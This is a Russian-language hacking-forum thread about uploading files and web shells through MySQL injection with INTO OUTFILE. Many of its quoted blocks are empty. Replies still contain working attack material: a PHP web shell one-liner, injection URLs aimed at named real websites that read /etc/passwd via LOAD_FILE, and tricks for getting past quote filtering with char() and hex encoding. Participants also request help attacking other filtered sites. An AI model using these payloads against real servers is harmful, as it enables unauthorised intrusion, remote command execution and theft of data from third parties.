![]() |
Загрузка файл через mysql inj.
Загрузка файл через mysql inj. [INTRO] Думаю будет полезно новичкам и тем у кого не было практики в этом вопросе. Статья узко направленная, поэтому маленькая по обьему. Побудило меня написать большое кол-во вопросов в icq. Тема Много где обсуждалась но нечего кроме теоритеческих данных не было сегодня мы полностью раскроем этот вопрос и протестим все на конкретном примере. [хек-хек] И так начнем. Наш подопытный: Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Проверям на запись файла общий синтаксис такой: Цитата:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource). Записываемый в файл текст мы кодируем в 0x+hex сделать это можно тут (http://hack-shop.org.ru/?page=6&ln=ru) Цитата:
Цитата:
Цитата:
Цитата:
Полный путь до www Цитата:
Видео урок можно скачать ТУТ Не стоит дефейсить сайт. Все данные предоставленные в статье предназначены только для ознакомления. С нетерпением жду коментов и вопросов. Спасибо за внимание. [ cash ] Hack-Shop.Org.Ru (c) |
хыхы. Сказал бы кому спасибо за обнаружение иньекции =)
Статья хорошая, но подобных уже полно |
2Spyder
Прочитай интро и покажи мне такую же статью ps иньекцию нашел не я, а Spyder но думаю не это главное... |
Все хорошо, только еще стоит уточнить, что для проведения данной атаки у mysql юзера должны быть права на работу с файлами, что в последнее время практически нигде не встречается + при экранировании кавычек into outfile не работает.
P.S. вижу что Слайдер просматривает тему, ща влепит минус за GET =)) |
Ну да ты прав.
экранирование кавычек можно обходить Цитата:
|
однотипная статья....таких в инете полно...
[cash] ты пишешь дохрена статей, но все на низком уровне, копай глубже. То что здесь написано даже ламеры знают... into outfile это не единственный способ вывести инфу в файл..... По крайне мере я знаю 3 способа.... Оценка: 3- Тема сисек не раскрыта! |
2k1b0rg
тебя вообще сложно удивить... |
Описанное тут есть в каждой статье по mysql-inj.
Хотелось бы узнать поподробнее про другие способы заливки шелла в mysql. Про into outfile + magic_quotes On тоже хотелось бы узнать :) |
Способ №2
Цитата:
Цитата:
|
Цитата:
А так в общем молодец, за труды респект ps и еще хочу добавить, основная задача ведь не в записи левой строчки в файл а в записи веб шелла <?php system($_GET[cmd]); ?> . Допустим ты создал файл shell.php c данной строчкой в /tmp, но ведь это самый минимум, самое простое. Основная задача пронклудить файл, что сложнее(конечто же если сайт не дырявый). Но может быть альтернатва, если ты раскрыл полный путь и нашел какуе то папочку с правами на запись тогда все проще намного. |
2_Pantera_
ну потести на каком нить серве поставь себе mysql и phpmyadmin into outfile работает как `(%60) так и с ' (%27) кавычками с "(%22) не пробывал но по идее тоже должно работать. Посмотри внизу статьи полный путь до www зачем что то инлудить??? |
работает ' и " а ковычки ` не работают я проверял, а ' (%27) и "(%22) воспринимается браузером одинаково
можешь сам потестить http://www.caduser.ru/acad/index.php?ver_id=1+union+select+1,'qqqqqqqq',3,4+f rom+mysql.user+into+outfile+"/tmp/file111.php"-- а инклудить надо для того что б шелл запустить, ведь он лижит не на сайте, а в /tmp ps попробуй на этом сайте проинклудить у меня не получилось если что стукне мне в аську или в пм |
еще экранирование кавычек (т.е. magic_quotes_gpc = On) можно обойти с помощью char().
|
Цитата:
|
Цитата:
|
2andy13
наркоман? 2madnet Я не борюсь за звание супер хакера я делюсь своими знаниями с теми кто знает меньше меня. Я знаю недостаки этих спасобов и что написанно много статей я пытался только помочь тем кто разбираеться меньше, если вы считаете эту статью недостойной то просто удалите ее. Многие из AMA SM вообще нечего не пишут хотя античат думаю один из лучших he порталов со статьями. 2all Если кто то из вас может дополнить то напишите, а говорить что это уже все знают смысл? |
2madnet: да, действительно, я имел в виду обход кавычек при чтении файлов.
не обратил внимание. 2[ cash ]: нет |
Если файл не удается прочитать можно попробовать его в таблицу запихнуть
PHP код:
PHP код:
PHP код:
|
интереснинькая статься - только сколько я не пробовал ети инекции всегда неполучалось в месте когда цыфры вводить нужно - поля не менялись - кто знает в чем трабла?
|
плз, выложите кто-нибудь видео ешё раз!
|
404 not found /video.rar
=\ Перезалейте |
На видио вы ничего особенного не увидете, если не поняли смысл того что написано, то и видио смотреть бессмысленно, имхо
|
У меня видео не осталось, спасибо модерам видео ачата что проигнорировали.
|
так кто знает способ заливки шелла,когда magic_quotes=on ?
|
Цитата:
PHP код:
|
Небольшое дополнение к статье
Бывает что у юзера от которого работает скрипт есть file_priv, но мы не можем узнать локальный путь до сайта, ну или не знаем папки на сайте. Если при возникновении неправильного запроса мы видим полное описание ошибки, то это может помочь нам в загрузке файла на сервер, т.к. мускул при попытке создать файл выводит номера ошибок Unix-подобных систем. т.е предположим мы хотим создать файл в каталоге root что нам в 99.99% случаях не получится, тогда MySQL выдаст нам нечто подобное Can't create/write to file '/root/xek.txt' (Errcode: 13) Ошибка с кодом 13 означает Permission Denied При попытке создать уже имеющийся файл: Can't create/write to file '/etc/passwd' (Errcode: 17) File already exists и при попытке создать файл в несуществующей директории: Can't create/write to file '/xek/nepoxek/123.txt' (Errcode: 2) No such file or directory Т.е благодаря простому перебору мы можем найти локальный путь к сайту, хотя это очень геморно и конечно не даёт 100% гарантии его нахождения Повторюсь что данные ошибки появляются не всегда =\ |
угу, я тоже замечал что то наподобие, я это написал в пояснении к видео по взлому, но видео так и не выложил, т.к. понял что в видео ничего суперпотрясающего нет...
вот цитата из пояснения: Цитата:
вот здесь про это можно прочитать: http://forum.antichat.ru/thread55237.html |
Mysql в шестой ветке всерьез задумались поддержать именитую x-технологий xml и дать нам еще одну возможность для подрузки файла - новая функция под названием LOAD XML.Насчет ограничений обрамления файла ковычками не знаю но на сайте mysql написано что имя файла должно быть заключено в ковычки. http://dev.mysql.com/doc/refman/6.0/en/load-xml.html |
У меня вопрос, вот пример есть сайт но там стоит фильтр на кавычки. Я могу читать файлы только через SQL HEX такой если я пример зашифрую
/tmp/shell.php - без ковычик в SQL HEX <?php system($_POST['cmd']);?> - SQL HEX и у меня получится так: http://site.com/index.php?id=-1+union+select+1,2,тут зашифрованный шелл в SQL HEX,4,5,6+from+user+into+outfile+а тут зашифрованный /tmp/shell.php в SQL HEX (0x746d702f7368656c6c2e706870)/* Это команда выполнится? То есть если у меня хватает прав на запись, то разницы нету в в SQL HEX я передаю или нет? |
нету
|
Цитата:
Цитата:
|
Ни одна из ссылок в первом посте на "жертву" не работает. А сам сайт соществует и по сей день, и остался таким же дырявым.)
Вот пару ссылок, кому интерестно: Код HTML:
http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4/*VERSION:5.0.32-Debian_7etch5-log DATABASE:research Код HTML:
http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,table_name,3,4+from+information_schema.tables+limit+17,10/*Теперь скрипт фильтрует ковычки, но переводом в char фильтрацию можно обойти. Сделать это по прежнему можно на упомянутом в самой статье сайте Цитата:
Код HTML:
http://research.udmercy.edu/library_information/circulation_services/page.php?id=-32+union+select+0,1,LOAD_FILE(0x2f6574632f706173737764),3,4/* |
помогите тож с скуль иньектом
проблема что фильтруются запрос sportID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,CHAR(39,60,115,99,114,105,112,116,62,97 ,108,101,114,116,40,50,49,51,41,32,60,47,115,99,11 4,105,112,116,62,39),20+from+t_sports+order+by+lev el+into+outfile+'/tmp/1.txt'/* Так как путь указан с кавычками то выпрыгивает ерор: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/1.txt''/* ORDER BY Level' at line 1 :confused: Как обойти фильтрацию? |
Статья хорошая. Плохо, что не написано при каких условиях возможно залить файл: то есть не написано, что надо, чтобы мы могли читать файлы, чтобы не фильтровалась ковычка, чтобы хватило прав на запись ;)
А так очень хорошо! Молодец! |
| Время: 17:54 |